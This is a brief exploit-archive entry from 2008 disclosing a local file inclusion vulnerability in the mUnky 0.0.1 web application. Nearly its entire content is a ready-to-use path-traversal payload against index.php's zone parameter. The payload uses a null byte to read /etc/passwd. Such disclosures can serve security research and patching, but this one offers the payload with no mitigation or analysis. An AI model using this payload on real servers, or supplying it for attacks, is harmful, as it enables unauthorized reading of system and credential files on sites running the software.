id: 3291
date: 06/24/2008
title: mUnky 0.0.1 (index.php zone) Local File Inclusion Vulnerability
author: StAkeR
cves: 

===============================================================
mUnky 0.0.1 (index.php zone) Local File Inclusion Vulnerability
===============================================================


@~~===========================================~~@
|  mUnky 0.0.1 <= Local File Inclusion Vuln     |
@~~===========================================~~@
|  index.php?zone=../../../../../etc/passwd%00  |                        
@~~===========================================~~@




#  0day.today [2023-03-24]  #